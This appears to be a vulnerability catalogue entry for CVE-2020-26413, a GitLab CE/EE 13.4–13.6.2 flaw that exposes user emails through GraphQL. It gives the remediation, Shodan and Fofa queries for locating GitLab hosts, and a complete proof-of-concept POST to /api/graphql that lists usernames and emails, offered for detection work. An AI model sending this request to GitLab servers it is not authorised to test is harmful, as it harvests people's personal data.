🔙 목록으로 돌아가기

CVE-2020-26413: Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure

TitleGitlab CE/EE 13.4 - 13.6.2 - Information Disclosure
Author_0xf4n9x_,pikpikcu
SeverityMedium
ImpactAn attacker can gain unauthorized access to sensitive information.
RemediationUpgrade Gitlab CE/EE to version 13.6.3 or later.
CVSS Score5.3
EPSS Score0.92644
CVE IDCVE-2020-26413
CWE IDCWE-200
Shodan Queryhttp.title:"GitLab"cpe:"cpe:2.3:a:gitlab:gitlab"http.title:"gitlab"
Fofa Querytitle="gitlab"
Tags cve cve2020 hackerone gitlab exposure enum graphql vuln

🔍 Vulnerability Description

GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

POST /api/graphql HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Connection: close
Content-Length: 227
Content-Type: application/json
Accept-Encoding: gzip

{

  "query": "{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }",

  "variables": null,

  "operationName": null

}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26413.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-26413.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A